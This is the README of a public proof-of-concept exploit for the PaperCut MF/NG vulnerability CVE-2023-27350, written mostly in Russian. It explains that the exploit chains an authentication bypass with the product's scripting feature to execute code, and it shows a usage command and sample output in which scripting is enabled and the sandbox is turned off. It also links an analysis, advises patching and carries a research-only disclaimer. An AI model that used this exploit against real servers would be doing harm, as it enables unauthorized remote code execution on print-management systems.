
Proof of Concept Exploit for PaperCut CVE-2023-27350
POC для CVE-2023-27350, затрагивающей PaperCut MF/NG
Технический анализ первопричины уязвимости, индикаторы компрометации и информация о распространении в интернете доступны в нашем блоге: https://www.horizon3.ai/papercut-cve-2023-27350-deep-dive-and-indicators-of-compromise
Этот POC использует уязвимость обхода аутентификации в связке с использованием встроенной функциональности скриптования для выполнения кода.
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y
Обновите до последней версии или примите меры в соответствии с инструкциями в бюллетене безопасности PaperCut:
Это программное обеспечение создано исключительно в целях академических исследований и для разработки эффективных методов защиты и не предназначено для атак на системы, за исключением случаев явного разрешения. Разработчики проекта не несут ответственности за неправомерное использование программного обеспечения. Используйте ответственно.